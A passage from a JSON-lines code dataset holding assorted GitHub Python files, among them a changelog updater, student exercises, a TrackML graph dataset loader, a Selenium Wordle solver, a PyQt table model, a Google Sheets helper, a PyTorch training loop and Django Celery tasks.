os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), '..')\n os.chdir(basedir)\n\n version_file = '../../eng/versioning/version_client.txt'\n version_pattern = '\\n## (\\d+\\.\\d+\\.\\d+(?:-[\\w\\d\\.]+)?) 
\\((.*?)\\)'\n date = datetime.date(datetime.now())\n\n for module in read_module():\n filename = os.path.join(module['name'], 'CHANGELOG.md')\n\n with open(filename) as fin:\n changelog = fin.read()\n\n first_version = re.search(version_pattern, changelog)\n if not first_version:\n logging.error('Cannot read version from {}'.format(filename))\n continue\n\n left = changelog[first_version.end():]\n second_version = re.search(version_pattern, left)\n if not second_version:\n current_changelog = left if left.strip() else '\\n\\n- Migrated from previous sdk\\n'\n else:\n left = left[:second_version.start()]\n left = removeEmptyEntry(left)\n if not re.search('\\n### ', left):\n current_changelog = '\\n\\n### Other Changes\\n\\n#### Dependency Updates\\n\\n- Updated core dependency from resources.\\n'\n else:\n current_changelog = left\n\n version: str = first_version.group().replace(\n first_version.group(2), str(date)).replace(\n first_version.group(1), get_version(module, version_file))\n\n new_changelog = changelog[:first_version.start()] + version + current_changelog\n if second_version:\n new_changelog += changelog[first_version.end() + second_version.start():]\n\n with open(filename, 'w') as fout:\n fout.write(new_changelog)\n\nif __name__ == \"__main__\":\n logging.basicConfig(format = '%(asctime)s %(levelname)s %(message)s')\n main()\n","repo_name":"Azure/azure-sdk-for-java","sub_path":"sdk/resourcemanager/tools/changelog.py","file_name":"changelog.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":2081,"dataset":"github-code","pt":"21"} +{"seq_id":"42963623225","text":"i = input()\nc = 0\nlista = []\nlista2 = []\nh = 0\nwhile i != \"fim\":\n lista.append(i)\n i = input()\nwhile c < len(lista):\n g = lista[c]\n if g[0] == \"a\":\n lista2.append(g)\n c += 1\n else:\n c += 1\nwhile h < len(lista2):\n print(lista2[h])\n h += 1","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_400/ch46_2019_03_19_19_53_38_144235.py","file_name":"ch46_2019_03_19_19_53_38_144235.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35247705236","text":"def dato_en_agenda(dato,agenda):\n if es_nombre(dato):\n if dato in agenda.keys():\n return True\n else:\n return False\n elif es_numero(dato):\n if dato in agenda.values():\n return True\n else:\n return False\n return None\n\ndef dar_nombre(numero,agenda):\n for clave,valor in agenda.items():\n if valor == numero:\n return clave\n \n\ndef es_nombre(entrada):\n if entrada[0].isalpha():\n return True\n return False\n\ndef es_numero(entrada): # +34 691 27 08 67\n # Internacional\n if entrada[0] == \"+\" and len(entrada.split())> 1:\n new_entrada = entrada.replace(\" \",\"\")\n if new_entrada[1:-1].isnumeric():\n lista_split = entrada.split()\n if len(lista_split[0]) > 1 and len(lista_split[0]) <= 5:\n return True\n # España\n entrada = entrada.replace(\" \",\"\")\n\n if entrada.isnumeric() and len(entrada) == 9:\n return True\n # No valido\n return None\n\ndef filtra_x(dato,agenda):\n diccionario = dict()\n lista = list()\n for clave in agenda.keys():\n if dato in clave:\n diccionario = {clave : agenda[clave]}\n lista.append(diccionario)\n return lista\n\n \n\n\nif __name__==\"__main__\":\n agenda_telefonica = dict()\n while True:\n entrada = input('Introduce un numero de telefono un nombre o un comando: ')\n if entrada.lower() == 'adios':\n break\n elif entrada.lower() == 
'listado':\n if len(agenda_telefonica) < 1:\n print(\"Aun no hay datos existentes\")\n else:\n agenda_ordenada = sorted(agenda_telefonica.items())\n print(agenda_ordenada)\n elif entrada.lower()[0:6] == 'filtra':\n entrada = entrada.split()\n if len(filtra_x(entrada[1], agenda_telefonica)) >= 1:\n print(filtra_x(entrada[1], agenda_telefonica))\n else:\n print(\"Ningun contacto\")\n elif es_nombre(entrada):\n if dato_en_agenda(entrada,agenda_telefonica):\n print(\"El numero de telefono de\",entrada,'es',agenda_telefonica[entrada])\n elif not dato_en_agenda(entrada,agenda_telefonica):\n numero_telefono = input(f'Introduce el numero de telefono para {entrada}: ')\n if es_numero(numero_telefono):\n if dato_en_agenda(numero_telefono,agenda_telefonica):\n print('Ese numero ya existe en la agenda')\n elif not dato_en_agenda(numero_telefono,agenda_telefonica):\n agenda_telefonica[entrada] = numero_telefono\n else:\n print('Numero de telefono no valido')\n \n elif es_numero(entrada):\n if dato_en_agenda(entrada,agenda_telefonica):\n print(\"El nombre dado al telefono\",entrada,'es',dar_nombre(entrada,agenda_telefonica))\n elif not dato_en_agenda(entrada,agenda_telefonica):\n nombre_telefono = input(f'Introduce el nombre para el numero {entrada}:')\n if es_nombre(nombre_telefono):\n if dato_en_agenda(nombre_telefono,agenda_telefonica):\n print('Ese numero ya existe en la agenda')\n elif not dato_en_agenda(nombre_telefono,agenda_telefonica):\n agenda_telefonica[nombre_telefono] = entrada\n else:\n print('Numero de telefono no valido')\n \n else:\n print(\"Entrada no valida\")","repo_name":"GonzaloPulido/ProgramacionCarpeta","sub_path":"Python/Relacion 5/Relacion 5_3/ej15.py","file_name":"ej15.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72705494132","text":"import numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset\nimport dgl\n\n# TrackML Dataset and collate\n\ndef get_edge_indices(edges):\n edge_pairs = []\n for i, neighbors in enumerate(edges):\n for e_idx in neighbors:\n edge_pairs.append([i,e_idx])\n return edge_pairs\n\ndef get_true_edge_values(pred_edge_idx, true_edges):\n values = [0] * len(pred_edge_idx)\n for i, (src, dst) in enumerate(pred_edge_idx):\n if dst in true_edges[src]:\n values[i] = 1\n return values\n\nclass TrackML_Dataset(Dataset):\n def __init__(self, samples):\n self.samples = samples\n\n def __getitem__(self, index):\n s = self.samples[index]\n \n hits = s['hits']\n xyz = hits['xyz']\n emb = hits['emb']\n pid = torch.FloatTensor(hits['particle_id'])\n weight = torch.FloatTensor(hits['weight'])\n hits = torch.FloatTensor(np.concatenate((xyz, emb), axis=1))\n \n\n graphs = s['graphs']\n pred_edges = graphs['pred']\n loss_edges = graphs['loss']\n true_edges = graphs['true']\n \n pred_edge_idx = get_edge_indices(pred_edges)\n true_edge_idx = get_edge_indices(loss_edges)\n true_edge_values = get_true_edge_values(true_edge_idx,true_edges)\n\n # Build inference graph\n g_input = dgl.DGLGraph()\n g_input.add_nodes(len(hits))\n src, dst = tuple(zip(*pred_edge_idx))\n g_input.add_edges(src, dst)\n g_input.ndata['feat'] = hits\n g_input.ndata['pid'] = pid\n g_input.ndata['weight'] = weight\n\n # Build ground truth graph\n g_true = dgl.DGLGraph()\n g_true.add_nodes(len(hits))\n src, dst = tuple(zip(*true_edge_idx))\n g_true.add_edges(src, dst)\n g_true.edata['truth'] = torch.FloatTensor(true_edge_values)\n \n g_input.set_n_initializer(dgl.init.zero_initializer)\n 
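# zero-initialize any node/edge features DGL has to create for these graphs (e.g. when batching)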
g_true.set_n_initializer(dgl.init.zero_initializer)\n g_input.set_e_initializer(dgl.init.zero_initializer)\n g_true.set_e_initializer(dgl.init.zero_initializer)\n \n return g_input, g_true\n \n def __len__(self):\n return len(self.samples)\n \ndef trackml_collate(sample):\n g_input = [s[0] for s in sample]\n g_input = dgl.batch(g_input)\n\n g_true = [s[1] for s in sample]\n g_true = dgl.batch(g_true)\n\n return g_input, g_true\n\n\n\n\n\"\"\"\nTrackML scoring metric (by Sabrina Amrouche, David Rousseau, Moritz Kiehn, Ilija Vukotic)\n\"\"\"\n\nimport pandas\n\ndef _analyze_tracks(truth, submission):\n particles_nhits = truth['particle_id'].value_counts(sort=False)\n total_weight = truth['weight'].sum()\n event = pandas.merge(truth[['hit_id', 'particle_id', 'weight']],\n submission[['hit_id', 'track_id']],\n on=['hit_id'], how='left', validate='one_to_one')\n event.drop('hit_id', axis=1, inplace=True)\n event.sort_values(by=['track_id', 'particle_id'], inplace=True)\n\n\n tracks = []\n rec_track_id = -1\n rec_nhits = 0\n cur_particle_id = -1\n cur_nhits = 0\n cur_weight = 0\n maj_particle_id = -1\n maj_nhits = 0\n maj_weight = 0\n\n for hit in event.itertuples(index=False):\n if (rec_track_id != -1) and (rec_track_id != hit.track_id):\n if maj_nhits < cur_nhits:\n maj_particle_id = cur_particle_id\n maj_nhits = cur_nhits\n maj_weight = cur_weight\n tracks.append((rec_track_id, rec_nhits, maj_particle_id,\n particles_nhits[maj_particle_id], maj_nhits,\n maj_weight / total_weight))\n\n if rec_track_id != hit.track_id:\n rec_track_id = hit.track_id\n rec_nhits = 1\n cur_particle_id = hit.particle_id\n cur_nhits = 1\n cur_weight = hit.weight\n maj_particle_id = -1\n maj_nhits = 0\n maj_weights = 0\n continue\n\n rec_nhits += 1\n\n if cur_particle_id != hit.particle_id:\n if maj_nhits < cur_nhits:\n maj_particle_id = cur_particle_id\n maj_nhits = cur_nhits\n maj_weight = cur_weight\n cur_particle_id = hit.particle_id\n cur_nhits = 1\n cur_weight = hit.weight\n else:\n cur_nhits += 1\n cur_weight += hit.weight\n\n if maj_nhits < cur_nhits:\n maj_particle_id = cur_particle_id\n maj_nhits = cur_nhits\n maj_weight = cur_weight\n tracks.append((rec_track_id, rec_nhits, maj_particle_id,\n particles_nhits[maj_particle_id], maj_nhits, maj_weight / total_weight))\n\n cols = ['track_id', 'nhits',\n 'major_particle_id', 'major_particle_nhits',\n 'major_nhits', 'major_weight']\n return pandas.DataFrame.from_records(tracks, columns=cols)\n\ndef score_event(truth, submission):\n tracks = _analyze_tracks(truth, submission)\n purity_rec = np.true_divide(tracks['major_nhits'], tracks['nhits'])\n purity_maj = np.true_divide(tracks['major_nhits'], tracks['major_particle_nhits'])\n good_track = (0.5 < purity_rec) & (0.5 < purity_maj)\n return tracks['major_weight'][good_track].sum()","repo_name":"xkuang/KDD-2019-Hands-on","sub_path":"2_clustering/gnn_utils.py","file_name":"gnn_utils.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"23054201632","text":"import random\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\n\n# TODO: KEEP TRACK OF SCORE (CSV FILE?? date, final_guess, total score (n/5)\n# TODO: WHEN EVALUATING LETTERS, SEE IF ITS ALREADY IN A CATEGORY.. 
WILL HELP WITH GUESSING.\n# TODO: QUIT DRIVER IF RUN OUT OF GUESS WORDS\n# TODO: QUIT DRIVER IF COULD NOT GUESS WORD\n\n\nclass WordleDriver:\n\n def __init__(self):\n self.service = Service(ChromeDriverManager().install())\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--headless\")\n self.driver = webdriver.Chrome(service=self.service, options=chrome_options)\n self.url = 'https://www.nytimes.com/games/wordle/index.html'\n self.driver.get(self.url)\n self.game_app = self.expand_shadow_element(self.driver.find_element(By.TAG_NAME, \"game-app\"))\n self.game_rows = self.game_app.find_elements(By.TAG_NAME, \"game-row\")\n time.sleep(2)\n self.close_instructions()\n\n def close_instructions(self):\n root2 = self.expand_shadow_element(self.game_app.find_element(By.TAG_NAME, \"game-modal\"))\n close_icon = root2.find_element(By.CSS_SELECTOR, 'div.close-icon')\n close_icon.click()\n\n def expand_shadow_element(self, element):\n shadow_root = self.driver.execute_script('return arguments[0].shadowRoot', element)\n return shadow_root\n\n def get_keyboard(self):\n keyboard = self.game_app.find_element(By.TAG_NAME, \"game-keyboard\")\n keyboard_shadow = self.expand_shadow_element(keyboard)\n letters = keyboard_shadow.find_elements(By.TAG_NAME, 'button')\n\n return letters\n\n def get_tiles(self, game_row):\n game_row_shadow = self.expand_shadow_element(game_row)\n tile_elements = game_row_shadow.find_elements(By.TAG_NAME, \"game-tile\")\n tiles = []\n\n for tile in tile_elements:\n tiles.append(self.expand_shadow_element(tile))\n\n return tiles\n\n\nclass WordleSolver(WordleDriver):\n\n def __init__(self, five_letter_words: list):\n super().__init__()\n self.common_five_letter_words = [\n 'FRAME',\n 'GRAZE',\n 'PAINT',\n 'GOURD',\n 'SWING',\n 'AUDIO',\n 'ARISE',\n 'WINDY'\n ]\n self.five_letter_words = five_letter_words\n self.correct_word = [\"_\", \"_\", \"_\", \"_\", \"_\"]\n self.letters_absent = []\n self.letters_present = {}\n self.guesses = []\n self.i_row = 0\n\n def solve(self):\n guess = \"_____\"\n\n while self.i_row < len(self.game_rows) and guess is not None:\n print(f\"Guess # {self.i_row + 1}\")\n print(f\"Length of valid five letter words: {len(self.five_letter_words)}\")\n print(f\"Letters absent: {', '.join(self.letters_absent)}\")\n print(f\"Letters present: {', '.join(self.letters_present.keys())}\")\n print(f\"Valid words: {', '.join(self.five_letter_words)}\")\n guess = self.new_guess()\n print(f\"Guess word: {guess}\")\n self.input_guess(guess)\n print(\"\")\n\n if \"_\" not in self.correct_word:\n print(f\"You won!\\nCorrect word: {''.join(self.correct_word)}\")\n self.driver.quit()\n break\n self.driver.quit()\n\n def new_guess(self):\n if len(self.guesses) == 0:\n guess = random.choice(self.common_five_letter_words)\n\n else:\n try:\n guess = random.choice(self.five_letter_words)\n except IndexError:\n print(f\"Looks like you've run out guesses. 
\\nLast guessed word: {self.guesses[-1]}\")\n print(f\"Correct word structure: {''.join(self.correct_word)}\")\n guess = None\n\n return guess\n\n def input_guess(self, guess):\n keyboard = self.get_keyboard()\n\n for letter in guess:\n for key in keyboard:\n if key.text == letter:\n key.click()\n\n for key in keyboard:\n if key.text == \"ENTER\":\n key.click()\n time.sleep(2.5)\n break\n\n if self.word_is_valid():\n self.i_row = self.i_row + 1\n self.guesses.append(guess)\n self.evaluate_guess()\n self.five_letter_words.remove(guess)\n self.remove_invalid_words()\n\n else:\n self.five_letter_words.remove(guess)\n print(\"Invalid Guess Word\")\n for key in keyboard:\n # Find the backspace\n if key.text == \"\":\n for _ in list(range(5)):\n key.click()\n time.sleep(0.2)\n break\n\n def word_is_valid(self):\n valid = True\n tiles = self.get_tiles(self.game_rows[self.i_row])\n\n for tile in tiles:\n tile_div = tile.find_element(By.TAG_NAME, \"div\")\n\n if tile_div.get_attribute(\"data-state\") == \"tbd\":\n valid = False\n else:\n continue\n return valid\n\n def evaluate_guess(self):\n tiles = self.get_tiles(self.game_rows[self.i_row - 1])\n\n # Get the evaluations from the tiles\n for index, tile in enumerate(tiles):\n tile_div = tile.find_element(By.TAG_NAME, \"div\")\n evaluation = tile_div.get_attribute(\"data-state\")\n letter = tile_div.text.upper()\n\n if evaluation == \"absent\":\n self.letters_absent.append(letter)\n\n elif evaluation == \"present\":\n self.letters_present[letter] = index\n\n elif evaluation == \"correct\":\n self.correct_word[index] = letter\n\n print(f\"Correct word: {''.join(self.correct_word)}\")\n\n def find_invalid_words(self):\n words_to_remove = []\n\n for word in self.five_letter_words:\n # Check if matches the correct word\n for i in list(range(5)):\n if self.correct_word[i] == \"_\":\n continue\n elif self.correct_word[i] == word[i]:\n continue\n else:\n words_to_remove.append(word)\n\n if word in words_to_remove:\n continue\n\n # Check if letter is truly absent and in word:\n for letter in self.letters_absent:\n\n if letter in word:\n if letter in self.correct_word:\n if self.correct_word.index(letter) == word.index(letter):\n continue\n else:\n words_to_remove.append(word)\n elif letter in self.letters_present.keys():\n continue\n else:\n words_to_remove.append(word)\n else:\n continue\n\n if word in words_to_remove:\n continue\n\n # Check if letter present is in word\n for letter in self.letters_present.keys():\n if letter in word:\n if self.letters_present[letter] == word.index(letter):\n words_to_remove.append(word)\n else:\n words_to_remove.append(word)\n\n if word in words_to_remove:\n continue\n\n return words_to_remove\n\n def remove_invalid_words(self):\n\n words_to_remove = self.find_invalid_words()\n\n for word in words_to_remove:\n try:\n self.five_letter_words.remove(word)\n except ValueError:\n continue\n\n\nif __name__ == \"__main__\":\n from english_words import english_words_lower_set\n\n five_letter_word = []\n correct_word = {}\n incorrect_placement = {}\n\n special_char = \"*-'[{]}\\|!^&()%$#,.?/><\"\n # Only use 5 letter words\n for words in english_words_lower_set:\n if len(words) == 5:\n for char in special_char:\n if char in words:\n break\n elif char == special_char[-1]:\n five_letter_word.append(words.upper())\n else:\n continue\n five_letter_word.append(\"LOWLY\")\n five_letter_word.append(\"FEWER\")\n\n wordle = WordleSolver(five_letter_word)\n 
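# run the solver loop: guess a word, read the tile feedback, prune the candidate list, repeat until solved or out of rows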
wordle.solve()\n","repo_name":"canasmh/WordleSolver","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":8500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105565531","text":"# Copyright (c) 2011-2013, ImageCat Inc.\n#\n# This program is free software: you can redistribute it and/or modify \n# it under the terms of the GNU Affero General Public License as published by \n# the Free Software Foundation, either version 3 of the License, or \n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, \n# but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License \n# along with this program. If not, see .\r\n#\n\"\"\"\r\ndialog for editing mapping scheme branches\r\n\"\"\"\r\nfrom PyQt4.QtCore import Qt, QVariant, QString, QAbstractTableModel, QModelIndex\r\nfrom ui.helper.common import build_attribute_tooltip\r\n\r\nclass MSLeavesTableModel(QAbstractTableModel):\r\n \"\"\"\r\n table model supporting visualization of node in mapping scheme tree\r\n \"\"\"\r\n def __init__(self, values, headers, formats, parser, valid_codes):\r\n \"\"\" constructor \"\"\"\r\n super(MSLeavesTableModel, self).__init__()\r\n\r\n self.headers = headers\n self.formats= formats\r\n self.parser=parser\r\n self.valid_codes=valid_codes\n self.values = values\n self.do_sort(sortIndex=0) \r\n \r\n def columnCount(self, parent):\r\n \"\"\" only three columns exist. always return 3 \"\"\"\r\n return len(self.headers)\r\n\r\n def rowCount(self, parent):\r\n \"\"\" number of rows same as number of siblings \"\"\"\r\n return len(self.values) \r\n\r\n def headerData(self, section, orientation, role):\r\n \"\"\" return data to diaply for header row \"\"\" \r\n if role == Qt.DisplayRole: \r\n if orientation == Qt.Horizontal:\r\n return QString(self.headers[section][0])\r\n else:\r\n # no vertical header\r\n return QVariant()\r\n elif role == Qt.ToolTipRole: \r\n return QString(self.headers[section][1])\r\n else: \r\n return QVariant()\r\n \r\n def data(self, index, role):\r\n \"\"\" return data to be displayed in a cell \"\"\"\n row, col = index.row(), index.column() \r\n value = self.values[row][col] \n if role == Qt.DisplayRole:\r\n if value is not None:\n return QString(self.formats[col] % value)\n else:\n return QVariant(\"\")\n elif role == Qt.ToolTipRole:\r\n # construct data for display in tooltip \r\n if (index.column() == 0): \r\n if value is not None:\r\n return build_attribute_tooltip(self.valid_codes, self.parser.parse(value))\r\n else:\r\n return QVariant(\"\")\r\n elif role == Qt.UserRole: \n return index.internalPointer()\n else:\r\n return QVariant()\r\n \n def index(self, row, column, parent):\n \"\"\" provide index to data given a cell \"\"\"\n try:\n node = self.values[row][len(self.headers)]\n return self.createIndex(row, column, node)\n except:\n return QModelIndex() \n \r\n def flags(self, index):\r\n \"\"\" cell condition flag \"\"\"\r\n # NOTE: \r\n # ItemIsEditable also required data() and setData() function\r\n return Qt.ItemIsEnabled | Qt.ItemIsSelectable\r\n\r\n def sort(self, ncol, order):\r\n \"\"\" sort table \"\"\"\r\n if ncol < 0 or ncol > len(self.headers):\r\n return\r\n self.layoutAboutToBeChanged.emit() \r\n self.do_sort(sortIndex=ncol, 
reverse_sort=order==Qt.DescendingOrder)\r\n self.layoutChanged.emit()\r\n\n # internal helper methods\n ############################### \r\n def do_sort(self, sortIndex = 0, reverse_sort=False):\n def sort_key(row):\n return row[sortIndex] \r\n self.values.sort(key=sort_key, reverse=reverse_sort)\r\n ","repo_name":"ImageCatInc/sidd","sub_path":"ui/helper/ms_leaves_table.py","file_name":"ms_leaves_table.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3684178584","text":"class Solution:\n def getSkyline(self, buildings: List[List[int]]) -> List[List[int]]:\n \n res = []\n \n # Sort buildings by their x-coordinates of the left edges\n buildings.sort(key=lambda b: b[0])\n \n active_buildings = [] # sorted by x-coordinate of the right edge\n max_height = 0 # current maximum height (for active buildings)\n \n def updateMax(bs): # update max height\n maxH = 0\n for b in bs:\n if b[2] > maxH:\n maxH = b[2]\n return maxH\n \n for building in buildings:\n \n i, n = 0, len(active_buildings)\n \n while active_buildings and active_buildings[0][1] < building[0]: # end before building?\n \n ending_building = active_buildings.pop(0)\n \n new_max = updateMax(active_buildings)\n \n if new_max != max_height: # update max_height and add the new point\n max_height = new_max\n res.append([ending_building[1], max_height, 1]) # 1 for ending\n \n if max_height < building[2]: # new building higher\n max_height = building[2]\n res.append([building[0], building[2], 0]) # add beginning (0 for beginning)\n \n # insert building into active_buildings (preserving the order)\n i, n = 0, len(active_buildings)\n while i < n and active_buildings[i][1] < building[1]:\n i += 1\n active_buildings.insert(i, building)\n \n while active_buildings:\n ending_building = active_buildings.pop(0)\n\n new_max = updateMax(active_buildings)\n if new_max != max_height: # update max_height and add the new point\n max_height = new_max\n res.append([ending_building[1], max_height, 1]) # for ending\n \n # Erase false duplicates ([[1,2,1],[1,2,2],[1,2,3]])\n print(res)\n new_res = []\n \n j, p = 0, len(res)\n \n while j < p:\n \n cnt = 1\n c_max = res[j][1]\n \n while j + cnt < p and res[j][0] == res[j+cnt][0]:\n if res[j][2] == 0:\n c_max = max(c_max, res[j+cnt][1])\n else:\n c_max = min(c_max, res[j+cnt][1]) # ending so take the minimum\n cnt += 1\n \n new_res.append([res[j][0], c_max])\n \n j += cnt\n \n return new_res","repo_name":"jathurchan/divecode.io","sub_path":"2020-2022/top-interview-questions/hard/218_TheSkylineProblem.py","file_name":"218_TheSkylineProblem.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1341941868","text":"def czy_istnieje_prostokat(dane):\n for i in range(len(dane) - 3):\n for j in range(i + 1, len(dane) - 2):\n for k in range(j + 1, len(dane) - 1):\n for l in range(k + 1, len(dane)):\n x1, y1 = dane[i]\n x2, y2 = dane[j]\n x3, y3 = dane[k]\n x4, y4 = dane[l]\n\n # Sprawdź czy punkty tworzą prostokąt\n if (x1 == x2) and (x3 == x4) and (y1 == y3) and (y2 == y4) and (x1 != x3) and (y1 != y2):\n # Sprawdź czy są równej długości\n if (y2 - y1) == (y4 - y3) and (x3 - x1) == (x4 - x2) and (y2 - y1) != (x4 - x2):\n check = 0\n for xd in range(i+1,l-1):\n if(xd !=j and xd !=k):\n if(x1 < dane[xd][0] < x3) and (y1 < dane[xd][1] < y2):\n check = -1\n break\n if(check == 0):\n return True\n\n return False\n\n# 
Przykładowe dane\ndane = [(0, 0), (0, 2), (3, 0), (3, 2), (1, 1), (2, 1), (1, 3), (2, 3), (4,5), (4,7), (5,5),(5,7)]\n\n# Wywołanie funkcji\ndane.sort()\nwynik = czy_istnieje_prostokat(dane)\nprint(wynik) ","repo_name":"karmiski/WDI","sub_path":"laboratorium 5/zadanie6.xd.py","file_name":"zadanie6.xd.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20722493320","text":"import os\n\nfrom apiclient import discovery\nfrom httplib2 import Http\nfrom oauth2client import client\n\n\ncredential_json = os.environ.get(\"CREDENTIALS\")\ncreds = client.OAuth2Credentials.from_json(credential_json)\nservice = discovery.build('sheets', 'v4', http=creds.authorize(Http()))\n\n\ndef grab_column(spreadsheetid, column, sheetname=\"\"):\n if sheetname != \"\":\n sheetname = sheetname + \"!\"\n\n column_values = service\\\n .spreadsheets()\\\n .values()\\\n .get(spreadsheetId=spreadsheetid, range='{}{}'.format(sheetname, column + \":\" + column))\\\n .execute()\n\n return column_values.get('values')\n\n\ndef update_cell(spreadsheetid, cell, body):\n service.spreadsheets().values().update(spreadsheetId=spreadsheetid, range=cell,\n valueInputOption='USER_ENTERED', body=body).execute()\n","repo_name":"shadd-anderson/google-spreadsheet-updater","sub_path":"spreadsheet_update.py","file_name":"spreadsheet_update.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17765712653","text":"import sys\r\nfrom collections import deque\r\n\r\nN = int(sys.stdin.readline())\r\n\r\nqueue = deque()\r\ndiscard = deque()\r\n\r\nfor i in range(1, N + 1):\r\n queue.append(i)\r\n\r\nfor i in range(N - 1):\r\n discard.append(queue.popleft())\r\n pop_value = queue.popleft()\r\n queue.append(pop_value)\r\n\r\ndiscard.append(queue.popleft())\r\n\r\nfor _ in range(N):\r\n result_value = discard.popleft()\r\n print(f\"{result_value}\", end=\" \")\r\n","repo_name":"heegane/baekjoon","sub_path":"백준/Silver/2161. 카드1/카드1.py","file_name":"카드1.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73385707252","text":"import torch\nfrom torch.nn import Module\nfrom torch.optim import Adam\nfrom torch.optim import Optimizer\nfrom util.shift_reduce_utils import binary_tree_to_sr, sr_to_tensor, as_batch\nfrom random import shuffle\nfrom inference_loops.point import Point\n\n\ndef _make_batch(data_slice, to_device):\n values = [to_device(torch.tensor([value])) for (value, _) in data_slice]\n values_batch = torch.cat(values)\n seqs = [seqs for (_, seqs) in data_slice]\n\n max_len = max([len(s[0]) for s in seqs])\n #padding with shift. 
The corresponding label should never affect gradient so should not matter\n #So we take 0.\n padding_label = torch.LongTensor([0])\n padded_seqs = [(((max_len-len(s[0]))*['s'] + s[0]), (max_len-len(s[0]))*[padding_label] + s[1]) for s in seqs]\n\n tensors = [sr_to_tensor(*s, to_device) for s in padded_seqs]\n batch = as_batch(tensors)\n\n return Point(batch, values_batch)\n\n\nclass BatchPerBatchLoop:\n def __init__(self, data_points, tree_model: Module, loss: Module, to_device, verbose: bool=True, batch_size=10,\n optimizer_factory: Optimizer = Adam, *optimizer_args, **optimizer_kwargs):\n self.data_points = data_points\n self._data_points = [(point.value, binary_tree_to_sr(point.tree)) for point in self.data_points]\n self.n_data = len(self.data_points)\n self.tree_model = tree_model\n self.loss = loss\n self.to_device = to_device\n self.optimizer = optimizer_factory(self.tree_model.parameters(), *optimizer_args, **optimizer_kwargs)\n self.batch_size = batch_size\n self.verbose = verbose\n\n def step(self, epoch=0):\n cumulated_loss = 0.\n epoch_loss = 0.\n instances = self._get_data_iterable(self.batch_size)\n for (i, instance) in instances:\n self.optimizer.zero_grad()\n\n value = self.tree_model(instance.tree)\n loss_and_grad = self.loss(value, instance.value)\n loss_and_grad.backward()\n\n self.optimizer.step()\n\n loss_value = loss_and_grad.item()\n cumulated_loss += loss_value\n epoch_loss += loss_value\n\n if self.verbose and i % 10 == 0:\n print(\"\\t[epoch %d, batch number %d] mean loss over the last 10 batches: %f\" % (epoch, i, cumulated_loss / 10))\n cumulated_loss = 0.\n\n if self.verbose:\n print(\"Epoch %d mean loss: %f\" % (epoch, epoch_loss/i))\n\n def train(self, epochs : int):\n for epoch in range(1, epochs+1):\n self.step(epoch)\n\n def _get_data_iterable(self, N):\n shuffle(self._data_points)\n n_batches = len(self._data_points) // N + (len(self._data_points) > 1)\n for i in range(n_batches):\n if i*N < self.n_data:\n yield (i+1, _make_batch(self._data_points[i*N:(i+1)*N], self.to_device))\n\n\n","repo_name":"avena554/listops_sandbox","sub_path":"inference_loops/batch_per_batch_loop.py","file_name":"batch_per_batch_loop.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71182303733","text":"from WebBlog.celery_tasks import app\nfrom .models import Blog\nfrom django_redis import get_redis_connection\nfrom django.core import mail\nfrom django.conf import settings\nimport logging\nimport os, django\n\nlog = logging.getLogger(\"django\")\n\n\n@app.task(name='update_count') # name表示设置任务的名称,如果不填写,则默认使用函数名做为任务名\ndef update_count():\n conn = get_redis_connection('default')\n blogs = []\n read_dict = conn.hgetall('read_count')\n for item in read_dict:\n blog_id = int(item.decode())\n # blog_id = int(item.split(':')[0])\n blog = Blog.objects.filter(pk=blog_id).first()\n blog.read_count += int(read_dict[item].decode())\n blogs.append(blog)\n conn.delete('read_count')\n Blog.objects.bulk_update(blogs, ['read_count'])\n\n\n@app.task\ndef send_email_celery(subject, message, email):\n mail.send_mail(\n subject=subject,\n message=message,\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[email]\n )\n\n# @app.task\n# def forget_password(csrftoken, email):\n#\n# mail.send_mail(\n# subject='找回密码',\n# message='请点击下面链接重置您的账户密码:{}/{}/'.format(settings.SERVER_NAME + \"/forget\",csrftoken),\n# from_email=settings.EMAIL_HOST_USER,\n# recipient_list=[email]\n# 
